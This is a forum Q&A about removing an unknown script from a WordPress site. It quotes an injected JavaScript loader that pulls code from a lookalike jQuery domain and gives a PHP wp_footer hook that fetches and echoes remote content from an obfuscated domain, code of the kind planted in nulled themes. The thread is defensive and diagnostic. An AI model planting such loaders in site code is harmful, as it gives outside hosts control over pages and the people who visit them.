Remove script from wordpress site

Question

I am using Malware bytes and every time I visit my wordpress site it blocks a script trying to run on the page, the script is:

<script type="text/javascript">
    if (!document.referrer || document.referrer == '') {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
    } else {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
    }
</script>

I'm not sure if it malicious or not but I would like to remove it, however I do not know which plugin or file is causing it, i've tried looking at page source, etc.

What does the script mean and is there a way to find out what's causing it?

Any help would be greatly appreciated.

Answer 1

You are using a wordpress plugin or theme that you probably downloaded from a repository of 'nulled' themes and plugins.

Almost all such websites use a business model whereby they offer premium themes and plugins which normally cost 5$-75$ for free.

But as the saying goes, there is no such thing as a free lunch. In exchange for the free plugin/theme, the website proprietor adds code which includes a js file from an outside domain which adds banners to your website.

To prevent the webmaster or developer from immediately noticing the banners (or just a back link or three), either anyone logged in as admin or/and anyone without a referrer url is not shown the advertisements.

In your case, the payload was being included from a domain which is similar to the real thing thereby fooling enough inexperienced Wordpress webmasters as something which belongs - jQuery. Official jQuery CDN is located here //code.jquery.com/

Make sure to check all themes or plugins from shady places for similar code which may also be inside image files though normally is inside init.php or functions.php. Here is another example of similar code using a different variation of jquery domain.

if(!function_exists('wp_func_jquery')) {
        function wp_func_jquery() {
            $host = 'http://';
            $jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
            if (@fopen($jquery,'r')){
                echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
            }
        }
        add_action('wp_footer', 'wp_func_jquery');
    }

Answer 2

You can search for this script in your wordpress directory using one of the applications proposed in this question: Tools to search for strings inside files without indexing.